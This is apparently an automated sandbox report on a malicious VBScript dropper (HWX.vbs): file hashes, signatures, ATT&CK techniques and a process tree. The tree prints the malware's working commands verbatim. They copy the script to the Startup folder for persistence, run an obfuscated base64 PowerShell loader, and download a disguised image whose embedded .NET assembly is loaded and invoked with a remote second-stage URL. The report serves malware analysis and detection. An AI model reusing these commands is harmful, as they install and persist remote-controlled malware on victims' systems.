26176205211fdce7ad34cf10d72f178f1646e913e368f0f5bcc325e5428a69cc

General

Target

HWX.vbs
Size

269KB
MD5

eff515cd80fca123c65f7ed20d7f071f
SHA1

6f7bf5b871e413f40f1c23e7953251d0fabbbf95
SHA256

26176205211fdce7ad34cf10d72f178f1646e913e368f0f5bcc325e5428a69cc
SHA512

f2959e3b6b618eca7f96b720c293fb47474440e0a65e838cd588af5078131a0c93bc76c151fd277a65e5f96e1b51d0bc4a56f657bae3a3d2ebe831017b78375e
SSDEEP

6144:t7jmLQQJm7ILm5BmZMLpRKsEAlOb4b5bdZ7ZmZ8Z7V:t7jmLQQJm7ILm5BmZMLp4sEAT

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

exe.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
5	2660	powershell.exe
7	2660	powershell.exe
9	2660	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ kGB.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ kGB.vbs	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2420	PING.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2868	powershell.exe
2984	powershell.exe
2660	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	2660	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2320 wrote to memory of 2752	2320	WScript.exe	28
PID 2320 wrote to memory of 2752	2320	WScript.exe	28
PID 2320 wrote to memory of 2752	2320	WScript.exe	28
PID 2752 wrote to memory of 2420	2752	cmd.exe	30
PID 2752 wrote to memory of 2420	2752	cmd.exe	30
PID 2752 wrote to memory of 2420	2752	cmd.exe	30
PID 2752 wrote to memory of 2808	2752	cmd.exe	31
PID 2752 wrote to memory of 2808	2752	cmd.exe	31
PID 2752 wrote to memory of 2808	2752	cmd.exe	31
PID 2808 wrote to memory of 2868	2808	cmd.exe	32
PID 2808 wrote to memory of 2868	2808	cmd.exe	32
PID 2808 wrote to memory of 2868	2808	cmd.exe	32
PID 2320 wrote to memory of 2984	2320	WScript.exe	33
PID 2320 wrote to memory of 2984	2320	WScript.exe	33
PID 2320 wrote to memory of 2984	2320	WScript.exe	33
PID 2984 wrote to memory of 2660	2984	powershell.exe	35
PID 2984 wrote to memory of 2660	2984	powershell.exe	35
PID 2984 wrote to memory of 2660	2984	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HWX.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2320
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\HWX.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ kGB.vbs')"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:2420
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\HWX.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ kGB.vbs')"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\HWX.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ kGB.vbs')
      4⤵
      Drops startup file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JChr(63)&Chr(63)BpChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBnChr(63)&Chr(63)GUChr(63)&Chr(63)VQByChr(63)&Chr(63)GwChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JwBoChr(63)&Chr(63)HQChr(63)&Chr(63)dChr(63)&Chr(63)BwChr(63)&Chr(63)HMChr(63)&Chr(63)OgChr(63)&Chr(63)vChr(63)&Chr(63)C8Chr(63)&Chr(63)dQBwChr(63)&Chr(63)GwChr(63)&Chr(63)bwBhChr(63)&Chr(63)GQChr(63)&Chr(63)ZChr(63)&Chr(63)BlChr(63)&Chr(63)GkChr(63)&Chr(63)bQBhChr(63)&Chr(63)GcChr(63)&Chr(63)ZQBuChr(63)&Chr(63)HMChr(63)&Chr(63)LgBjChr(63)&Chr(63)G8Chr(63)&Chr(63)bQChr(63)&Chr(63)uChr(63)&Chr(63)GIChr(63)&Chr(63)cgChr(63)&Chr(63)vChr(63)&Chr(63)GkChr(63)&Chr(63)bQBhChr(63)&Chr(63)GcChr(63)&Chr(63)ZQBzChr(63)&Chr(63)C8Chr(63)&Chr(63)MChr(63)&Chr(63)Chr(63)&Chr(63)wChr(63)&Chr(63)DQChr(63)&Chr(63)LwChr(63)&Chr(63)1Chr(63)&Chr(63)DYChr(63)&Chr(63)MwChr(63)&Chr(63)vChr(63)&Chr(63)DYChr(63)&Chr(63)MgChr(63)&Chr(63)xChr(63)&Chr(63)C8Chr(63)&Chr(63)bwByChr(63)&Chr(63)GkChr(63)&Chr(63)ZwBpChr(63)&Chr(63)G4Chr(63)&Chr(63)YQBsChr(63)&Chr(63)C8Chr(63)&Chr(63)dQBuChr(63)&Chr(63)GkChr(63)&Chr(63)dgBlChr(63)&Chr(63)HIChr(63)&Chr(63)cwBvChr(63)&Chr(63)F8Chr(63)&Chr(63)dgBiChr(63)&Chr(63)HMChr(63)&Chr(63)LgBqChr(63)&Chr(63)HChr(63)&Chr(63)Chr(63)&Chr(63)ZQBnChr(63)&Chr(63)D8Chr(63)&Chr(63)MQChr(63)&Chr(63)2Chr(63)&Chr(63)DkChr(63)&Chr(63)MChr(63)&Chr(63)Chr(63)&Chr(63)5Chr(63)&Chr(63)DMChr(63)&Chr(63)MQChr(63)&Chr(63)4Chr(63)&Chr(63)DUChr(63)&Chr(63)NQChr(63)&Chr(63)nChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)B3Chr(63)&Chr(63)GUChr(63)&Chr(63)YgBDChr(63)&Chr(63)GwChr(63)&Chr(63)aQBlChr(63)&Chr(63)G4Chr(63)&Chr(63)dChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)D0Chr(63)&Chr(63)IChr(63)&Chr(63)BOChr(63)&Chr(63)GUChr(63)&Chr(63)dwChr(63)&Chr(63)tChr(63)&Chr(63)E8Chr(63)&Chr(63)YgBqChr(63)&Chr(63)GUChr(63)&Chr(63)YwB0Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)UwB5Chr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)BlChr(63)&Chr(63)G0Chr(63)&Chr(63)LgBOChr(63)&Chr(63)GUChr(63)&Chr(63)dChr(63)&Chr(63)Chr(63)&Chr(63)uChr(63)&Chr(63)FcChr(63)&Chr(63)ZQBiChr(63)&Chr(63)EMChr(63)&Chr(63)bChr(63)&Chr(63)BpChr(63)&Chr(63)GUChr(63)&Chr(63)bgB0Chr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BpChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBnChr(63)&Chr(63)GUChr(63)&Chr(63)QgB5Chr(63)&Chr(63)HQChr(63)&Chr(63)ZQBzChr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)PQChr(63)&Chr(63)gChr(63)&Chr(63)CQChr(63)&Chr(63)dwBlChr(63)&Chr(63)GIChr(63)&Chr(63)QwBsChr(63)&Chr(63)GkChr(63)&Chr(63)ZQBuChr(63)&Chr(63)HQChr(63)&Chr(63)LgBEChr(63)&Chr(63)G8Chr(63)&Chr(63)dwBuChr(63)&Chr(63)GwChr(63)&Chr(63)bwBhChr(63)&Chr(63)GQChr(63)&Chr(63)RChr(63)&Chr(63)BhChr(63)&Chr(63)HQChr(63)&Chr(63)YQChr(63)&Chr(63)oChr(63)&Chr(63)CQChr(63)&Chr(63)aQBtChr(63)&Chr(63)GEChr(63)&Chr(63)ZwBlChr(63)&Chr(63)FUChr(63)&Chr(63)cgBsChr(63)&Chr(63)CkChr(63)&Chr(63)OwChr(63)&Chr(63)kChr(63)&Chr(63)GkChr(63)&Chr(63)bQBhChr(63)&Chr(63)GcChr(63)&Chr(63)ZQBUChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)B0Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)PQChr(63)&Chr(63)gChr(63)&Chr(63)FsChr(63)&Chr(63)UwB5Chr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)BlChr(63)&Chr(63)G0Chr(63)&Chr(63)LgBUChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)B0Chr(63)&Chr(63)C4Chr(63)&Chr(63)RQBuChr(63)&Chr(63)GMChr(63)&Chr(63)bwBkChr(63)&Chr(63)GkChr(63)&Chr(63)bgBnChr(63)&Chr(63)F0Chr(63)&Chr(63)OgChr(63)&Chr(63)6Chr(63)&Chr(63)FUChr(63)&Chr(63)VChr(63)&Chr(63)BGChr(63)&Chr(63)DgChr(63)&Chr(63)LgBHChr(63)&Chr(63)GUChr(63)&Chr(63)dChr(63)&Chr(63)BTChr(63)&Chr(63)HQChr(63)&Chr(63)cgBpChr(63)&Chr(63)G4Chr(63)&Chr(63)ZwChr(63)&Chr(63)oChr(63)&Chr(63)CQChr(63)&Chr(63)aQBtChr(63)&Chr(63)GEChr(63)&Chr(63)ZwBlChr(63)&Chr(63)EIChr(63)&Chr(63)eQB0Chr(63)&Chr(63)GUChr(63)&Chr(63)cwChr(63)&Chr(63)pChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)RgBsChr(63)&Chr(63)GEChr(63)&Chr(63)ZwChr(63)&Chr(63)gChr(63)&Chr(63)D0Chr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)nChr(63)&Chr(63)DwChr(63)&Chr(63)PChr(63)&Chr(63)BCChr(63)&Chr(63)EEChr(63)&Chr(63)UwBFChr(63)&Chr(63)DYChr(63)&Chr(63)NChr(63)&Chr(63)BfChr(63)&Chr(63)FMChr(63)&Chr(63)VChr(63)&Chr(63)BBChr(63)&Chr(63)FIChr(63)&Chr(63)VChr(63)&Chr(63)Chr(63)&Chr(63)+Chr(63)&Chr(63)D4Chr(63)&Chr(63)JwChr(63)&Chr(63)7Chr(63)&Chr(63)CQChr(63)&Chr(63)ZQBuChr(63)&Chr(63)GQChr(63)&Chr(63)RgBsChr(63)&Chr(63)GEChr(63)&Chr(63)ZwChr(63)&Chr(63)gChr(63)&Chr(63)D0Chr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)nChr(63)&Chr(63)DwChr(63)&Chr(63)PChr(63)&Chr(63)BCChr(63)&Chr(63)EEChr(63)&Chr(63)UwBFChr(63)&Chr(63)DYChr(63)&Chr(63)NChr(63)&Chr(63)BfChr(63)&Chr(63)EUChr(63)&Chr(63)TgBEChr(63)&Chr(63)D4Chr(63)&Chr(63)PgChr(63)&Chr(63)nChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)SQBuChr(63)&Chr(63)GQChr(63)&Chr(63)ZQB4Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)PQChr(63)&Chr(63)gChr(63)&Chr(63)CQChr(63)&Chr(63)aQBtChr(63)&Chr(63)GEChr(63)&Chr(63)ZwBlChr(63)&Chr(63)FQChr(63)&Chr(63)ZQB4Chr(63)&Chr(63)HQChr(63)&Chr(63)LgBJChr(63)&Chr(63)G4Chr(63)&Chr(63)ZChr(63)&Chr(63)BlChr(63)&Chr(63)HgChr(63)&Chr(63)TwBmChr(63)&Chr(63)CgChr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)RgBsChr(63)&Chr(63)GEChr(63)&Chr(63)ZwChr(63)&Chr(63)pChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BlChr(63)&Chr(63)G4Chr(63)&Chr(63)ZChr(63)&Chr(63)BJChr(63)&Chr(63)G4Chr(63)&Chr(63)ZChr(63)&Chr(63)BlChr(63)&Chr(63)HgChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)BpChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBnChr(63)&Chr(63)GUChr(63)&Chr(63)VChr(63)&Chr(63)BlChr(63)&Chr(63)HgChr(63)&Chr(63)dChr(63)&Chr(63)Chr(63)&Chr(63)uChr(63)&Chr(63)EkChr(63)&Chr(63)bgBkChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)BPChr(63)&Chr(63)GYChr(63)&Chr(63)KChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GUChr(63)&Chr(63)bgBkChr(63)&Chr(63)EYChr(63)&Chr(63)bChr(63)&Chr(63)BhChr(63)&Chr(63)GcChr(63)&Chr(63)KQChr(63)&Chr(63)7Chr(63)&Chr(63)CQChr(63)&Chr(63)cwB0Chr(63)&Chr(63)GEChr(63)&Chr(63)cgB0Chr(63)&Chr(63)EkChr(63)&Chr(63)bgBkChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)C0Chr(63)&Chr(63)ZwBlChr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)MChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)C0Chr(63)&Chr(63)YQBuChr(63)&Chr(63)GQChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GUChr(63)&Chr(63)bgBkChr(63)&Chr(63)EkChr(63)&Chr(63)bgBkChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)C0Chr(63)&Chr(63)ZwB0Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)SQBuChr(63)&Chr(63)GQChr(63)&Chr(63)ZQB4Chr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)SQBuChr(63)&Chr(63)GQChr(63)&Chr(63)ZQB4Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)KwChr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)RgBsChr(63)&Chr(63)GEChr(63)&Chr(63)ZwChr(63)&Chr(63)uChr(63)&Chr(63)EwChr(63)&Chr(63)ZQBuChr(63)&Chr(63)GcChr(63)&Chr(63)dChr(63)&Chr(63)BoChr(63)&Chr(63)DsChr(63)&Chr(63)JChr(63)&Chr(63)BiChr(63)&Chr(63)GEChr(63)&Chr(63)cwBlChr(63)&Chr(63)DYChr(63)&Chr(63)NChr(63)&Chr(63)BMChr(63)&Chr(63)GUChr(63)&Chr(63)bgBnChr(63)&Chr(63)HQChr(63)&Chr(63)aChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)D0Chr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GUChr(63)&Chr(63)bgBkChr(63)&Chr(63)EkChr(63)&Chr(63)bgBkChr(63)&Chr(63)GUChr(63)&Chr(63)eChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)C0Chr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)BhChr(63)&Chr(63)HIChr(63)&Chr(63)dChr(63)&Chr(63)BJChr(63)&Chr(63)G4Chr(63)&Chr(63)ZChr(63)&Chr(63)BlChr(63)&Chr(63)HgChr(63)&Chr(63)OwChr(63)&Chr(63)kChr(63)&Chr(63)GIChr(63)&Chr(63)YQBzChr(63)&Chr(63)GUChr(63)&Chr(63)NgChr(63)&Chr(63)0Chr(63)&Chr(63)EMChr(63)&Chr(63)bwBtChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBuChr(63)&Chr(63)GQChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)BpChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBnChr(63)&Chr(63)GUChr(63)&Chr(63)VChr(63)&Chr(63)BlChr(63)&Chr(63)HgChr(63)&Chr(63)dChr(63)&Chr(63)Chr(63)&Chr(63)uChr(63)&Chr(63)FMChr(63)&Chr(63)dQBiChr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)ByChr(63)&Chr(63)GkChr(63)&Chr(63)bgBnChr(63)&Chr(63)CgChr(63)&Chr(63)JChr(63)&Chr(63)BzChr(63)&Chr(63)HQChr(63)&Chr(63)YQByChr(63)&Chr(63)HQChr(63)&Chr(63)SQBuChr(63)&Chr(63)GQChr(63)&Chr(63)ZQB4Chr(63)&Chr(63)CwChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GIChr(63)&Chr(63)YQBzChr(63)&Chr(63)GUChr(63)&Chr(63)NgChr(63)&Chr(63)0Chr(63)&Chr(63)EwChr(63)&Chr(63)ZQBuChr(63)&Chr(63)GcChr(63)&Chr(63)dChr(63)&Chr(63)BoChr(63)&Chr(63)CkChr(63)&Chr(63)OwChr(63)&Chr(63)kChr(63)&Chr(63)GMChr(63)&Chr(63)bwBtChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBuChr(63)&Chr(63)GQChr(63)&Chr(63)QgB5Chr(63)&Chr(63)HQChr(63)&Chr(63)ZQBzChr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)PQChr(63)&Chr(63)gChr(63)&Chr(63)FsChr(63)&Chr(63)UwB5Chr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)BlChr(63)&Chr(63)G0Chr(63)&Chr(63)LgBDChr(63)&Chr(63)G8Chr(63)&Chr(63)bgB2Chr(63)&Chr(63)GUChr(63)&Chr(63)cgB0Chr(63)&Chr(63)F0Chr(63)&Chr(63)OgChr(63)&Chr(63)6Chr(63)&Chr(63)EYChr(63)&Chr(63)cgBvChr(63)&Chr(63)G0Chr(63)&Chr(63)QgBhChr(63)&Chr(63)HMChr(63)&Chr(63)ZQChr(63)&Chr(63)2Chr(63)&Chr(63)DQChr(63)&Chr(63)UwB0Chr(63)&Chr(63)HIChr(63)&Chr(63)aQBuChr(63)&Chr(63)GcChr(63)&Chr(63)KChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GIChr(63)&Chr(63)YQBzChr(63)&Chr(63)GUChr(63)&Chr(63)NgChr(63)&Chr(63)0Chr(63)&Chr(63)EMChr(63)&Chr(63)bwBtChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBuChr(63)&Chr(63)GQChr(63)&Chr(63)KQChr(63)&Chr(63)7Chr(63)&Chr(63)CQChr(63)&Chr(63)bChr(63)&Chr(63)BvChr(63)&Chr(63)GEChr(63)&Chr(63)ZChr(63)&Chr(63)BlChr(63)&Chr(63)GQChr(63)&Chr(63)QQBzChr(63)&Chr(63)HMChr(63)&Chr(63)ZQBtChr(63)&Chr(63)GIChr(63)&Chr(63)bChr(63)&Chr(63)B5Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)PQChr(63)&Chr(63)gChr(63)&Chr(63)FsChr(63)&Chr(63)UwB5Chr(63)&Chr(63)HMChr(63)&Chr(63)dChr(63)&Chr(63)BlChr(63)&Chr(63)G0Chr(63)&Chr(63)LgBSChr(63)&Chr(63)GUChr(63)&Chr(63)ZgBsChr(63)&Chr(63)GUChr(63)&Chr(63)YwB0Chr(63)&Chr(63)GkChr(63)&Chr(63)bwBuChr(63)&Chr(63)C4Chr(63)&Chr(63)QQBzChr(63)&Chr(63)HMChr(63)&Chr(63)ZQBtChr(63)&Chr(63)GIChr(63)&Chr(63)bChr(63)&Chr(63)B5Chr(63)&Chr(63)F0Chr(63)&Chr(63)OgChr(63)&Chr(63)6Chr(63)&Chr(63)EwChr(63)&Chr(63)bwBhChr(63)&Chr(63)GQChr(63)&Chr(63)KChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)GMChr(63)&Chr(63)bwBtChr(63)&Chr(63)G0Chr(63)&Chr(63)YQBuChr(63)&Chr(63)GQChr(63)&Chr(63)QgB5Chr(63)&Chr(63)HQChr(63)&Chr(63)ZQBzChr(63)&Chr(63)CkChr(63)&Chr(63)OwChr(63)&Chr(63)kChr(63)&Chr(63)HQChr(63)&Chr(63)eQBwChr(63)&Chr(63)GUChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)BsChr(63)&Chr(63)G8Chr(63)&Chr(63)YQBkChr(63)&Chr(63)GUChr(63)&Chr(63)ZChr(63)&Chr(63)BBChr(63)&Chr(63)HMChr(63)&Chr(63)cwBlChr(63)&Chr(63)G0Chr(63)&Chr(63)YgBsChr(63)&Chr(63)HkChr(63)&Chr(63)LgBHChr(63)&Chr(63)GUChr(63)&Chr(63)dChr(63)&Chr(63)BUChr(63)&Chr(63)HkChr(63)&Chr(63)cChr(63)&Chr(63)BlChr(63)&Chr(63)CgChr(63)&Chr(63)JwBGChr(63)&Chr(63)GkChr(63)&Chr(63)YgBlChr(63)&Chr(63)HIChr(63)&Chr(63)LgBIChr(63)&Chr(63)G8Chr(63)&Chr(63)bQBlChr(63)&Chr(63)CcChr(63)&Chr(63)KQChr(63)&Chr(63)7Chr(63)&Chr(63)CQChr(63)&Chr(63)bQBlChr(63)&Chr(63)HQChr(63)&Chr(63)aChr(63)&Chr(63)BvChr(63)&Chr(63)GQChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)JChr(63)&Chr(63)B0Chr(63)&Chr(63)HkChr(63)&Chr(63)cChr(63)&Chr(63)BlChr(63)&Chr(63)C4Chr(63)&Chr(63)RwBlChr(63)&Chr(63)HQChr(63)&Chr(63)TQBlChr(63)&Chr(63)HQChr(63)&Chr(63)aChr(63)&Chr(63)BvChr(63)&Chr(63)GQChr(63)&Chr(63)KChr(63)&Chr(63)Chr(63)&Chr(63)nChr(63)&Chr(63)FYChr(63)&Chr(63)QQBJChr(63)&Chr(63)CcChr(63)&Chr(63)KQChr(63)&Chr(63)7Chr(63)&Chr(63)CQChr(63)&Chr(63)YQByChr(63)&Chr(63)GcChr(63)&Chr(63)dQBtChr(63)&Chr(63)GUChr(63)&Chr(63)bgB0Chr(63)&Chr(63)HMChr(63)&Chr(63)IChr(63)&Chr(63)Chr(63)&Chr(63)9Chr(63)&Chr(63)CChr(63)&Chr(63)Chr(63)&Chr(63)LChr(63)&Chr(63)Chr(63)&Chr(63)oChr(63)&Chr(63)CcChr(63)&Chr(63)dChr(63)&Chr(63)B4Chr(63)&Chr(63)HQChr(63)&Chr(63)LgChr(63)&Chr(63)4Chr(63)&Chr(63)DkChr(63)&Chr(63)cQB1Chr(63)&Chr(63)GwChr(63)&Chr(63)LwBsChr(63)&Chr(63)HQChr(63)&Chr(63)LwChr(63)&Chr(63)3Chr(63)&Chr(63)DYChr(63)&Chr(63)MQChr(63)&Chr(63)uChr(63)&Chr(63)DEChr(63)&Chr(63)NgChr(63)&Chr(63)xChr(63)&Chr(63)C4Chr(63)&Chr(63)NgChr(63)&Chr(63)1Chr(63)&Chr(63)DEChr(63)&Chr(63)LgChr(63)&Chr(63)0Chr(63)&Chr(63)DkChr(63)&Chr(63)LwChr(63)&Chr(63)vChr(63)&Chr(63)DoChr(63)&Chr(63)cChr(63)&Chr(63)B0Chr(63)&Chr(63)HQChr(63)&Chr(63)aChr(63)&Chr(63)Chr(63)&Chr(63)nChr(63)&Chr(63)CkChr(63)&Chr(63)OwChr(63)&Chr(63)kChr(63)&Chr(63)G0Chr(63)&Chr(63)ZQB0Chr(63)&Chr(63)GgChr(63)&Chr(63)bwBkChr(63)&Chr(63)C4Chr(63)&Chr(63)SQBuChr(63)&Chr(63)HYChr(63)&Chr(63)bwBrChr(63)&Chr(63)GUChr(63)&Chr(63)KChr(63)&Chr(63)Chr(63)&Chr(63)kChr(63)&Chr(63)G4Chr(63)&Chr(63)dQBsChr(63)&Chr(63)GwChr(63)&Chr(63)LChr(63)&Chr(63)Chr(63)&Chr(63)gChr(63)&Chr(63)CQChr(63)&Chr(63)YQByChr(63)&Chr(63)GcChr(63)&Chr(63)dQBtChr(63)&Chr(63)GUChr(63)&Chr(63)bgB0Chr(63)&Chr(63)HMChr(63)&Chr(63)KQChr(63)&Chr(63)=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('Chr(63)&Chr(63)','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.89qul/lt/761.161.651.49//:ptth');$method.Invoke($null, $arguments)"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
4c777dc59d755d4680726d85c8d45deb

SHA1
e07f173fcc6f0ef9028e04328277d1294adb8c29

SHA256
d030aef8ffc593605e2f2af9df6e7dd300ac6fb846e765b35b617ce22a3a0d00

SHA512
